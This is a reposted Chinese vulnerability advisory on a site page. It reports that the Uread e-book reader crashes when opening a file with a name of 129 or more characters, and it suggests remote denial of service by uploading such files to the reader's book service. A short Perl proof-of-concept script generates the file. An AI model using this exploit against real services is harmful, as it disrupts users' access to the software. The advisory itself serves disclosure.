Uread閱讀器拒絕服務漏洞的分析與解決

2022-9-27 15:40| 查看: 2682 |來源: 互聯網

Uread閱讀器在遠程或本地打開文件名過長（大于或等于129個字符）的upub等文件時將引起uread.exe程序無法正常工作，必須重新啟動uread.exe進程方可。遠程攻擊者可考慮將過長文件名的文件上傳至“至善讀書”的服務器

Uread閱讀器在遠程或本地打開文件名過長（大于或等于129個字符）的upub等文件時將引起uread.exe程序無法正常工作，必須重新啟動uread.exe進程方可。
遠程攻擊者可考慮將過長文件名的文件上傳至“至善讀書”的服務器端，實現遠程拒絕服務攻擊。
測試證明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修復方案：
目前廠商還沒有提供補丁或者升級程序。
作者 demonalex

本文最后更新于 2022-9-27 15:40，某些文章具有時效性，若有錯誤或已失效，請在網站留言或聯系站長：17tui@17tui.com

·END·

站長網微信號：w17tui，關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明：本站部分文章和圖片均來自用戶投稿和網絡收集，旨在傳播知識，文章和圖片版權歸原作者及原出處所有，僅供學習與參考，請勿用于商業用途，如果損害了您的權利，請聯系我們及時修正或刪除。謝謝！

下一篇：Velocity Parse()函數引發的本地包含漏洞及利用方法上一篇：PHP漏洞全解

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域，為您提供最新最全的互聯網資訊，幫助站長轉型升級，為互聯網創業者提供更加優質的創業信息和品牌營銷服務，與站長一起進步！讓互聯網創業者不再孤獨！

掃一掃，關注站長網微信

亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

Uread閱讀器拒絕服務漏洞的分析與解決

大家都在看

相關分類

熱門排行

最近更新